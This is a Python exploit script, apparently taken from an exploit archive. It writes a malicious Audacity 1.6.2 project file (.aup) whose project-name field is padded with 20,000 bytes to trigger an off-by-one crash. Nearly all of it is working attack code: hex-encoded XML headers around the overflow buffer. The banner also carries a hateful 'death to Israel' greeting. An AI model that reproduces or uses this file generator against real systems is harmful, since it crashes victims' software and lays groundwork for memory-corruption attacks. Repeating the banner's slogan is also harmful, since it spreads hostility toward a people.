Audacity version 1.6.2 remote off by one crash exploit that creates a malicious .aup file.
c8fd5c94251952b01f4ae7e071e2b3452ff7456c26201ad20e081651d89c527f
#usage: exploit.py
print "**************************************************************************"
print " Audacity 1.6.2 (.aup file ) Remote off by one Crash Exploit\n"
print " Author: Mountassif Moad "
print " the best: Evil finger & v4 Team "
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to: All friends"
print " almawto li israel\n"
print "**************************************************************************"
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72"
"\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f"
"\x3e\x0d\x0a\x3c\x61\x75\x64\x61\x63\x69\x74"
"\x79\x70\x72\x6f\x6a\x65\x63\x74\x20\x70\x72"
"\x6f\x6a\x6e\x61\x6d\x65\x3d\x22"
)
header2 = (
"\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"
"\x31\x2e\x31\x2e\x30\x22\x20\x61\x75\x64\x61"
"\x63\x69\x74\x79\x76\x65\x72\x73\x69\x6f\x6e"
"\x3d\x22\x31\x2e\x32\x2e\x36\x22\x20\x73\x65"
"\x6c\x30\x3d\x22\x30\x2e\x30\x30\x30\x30\x30"
"\x30\x30\x30\x30\x30\x22\x20\x73\x65\x6c\x31"
"\x3d\x22\x30\x2e\x30\x30\x30\x30\x30\x30\x30"
"\x30\x30\x30\x22\x20\x76\x70\x6f\x73\x3d\x22"
"\x30\x22\x20\x68\x3d\x22\x30\x2e\x30\x30\x30"
"\x30\x30\x30\x30\x30\x30\x30\x22\x20\x7a\x6f"
"\x6f\x6d\x3d\x22\x38\x36\x2e\x31\x33\x32\x38"
"\x31\x32\x35\x30\x30\x30\x22\x20\x72\x61\x74"
"\x65\x3d\x22\x34\x34\x31\x30\x30\x2e\x30\x30"
"\x30\x30\x30\x30\x22\x20\x3e\x0d\x0a\x09\x3c"
"\x74\x61\x67\x73\x20\x74\x69\x74\x6c\x65\x3d"
"\x22\x22\x20\x61\x72\x74\x69\x73\x74\x3d\x22"
"\x22\x20\x61\x6c\x62\x75\x6d\x3d\x22\x22\x20"
"\x74\x72\x61\x63\x6b\x3d\x22\x2d\x31\x22\x20"
"\x79\x65\x61\x72\x3d\x22\x22\x20\x67\x65\x6e"
"\x72\x65\x3d\x22\x2d\x31\x22\x20\x63\x6f\x6d"
"\x6d\x65\x6e\x74\x73\x3d\x22\x22\x20\x69\x64"
"\x33\x76\x32\x3d\x22\x31\x22\x20\x2f\x3e\x0d"
"\x0a\x3c\x2f\x61\x75\x64\x61\x63\x69\x74\x79"
"\x70\x72\x6f\x6a\x65\x63\x74\x3e"
)
buff = "\x41" * 20000
exploit = header + buff + header2
try:
out_file = open("crash.aup",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"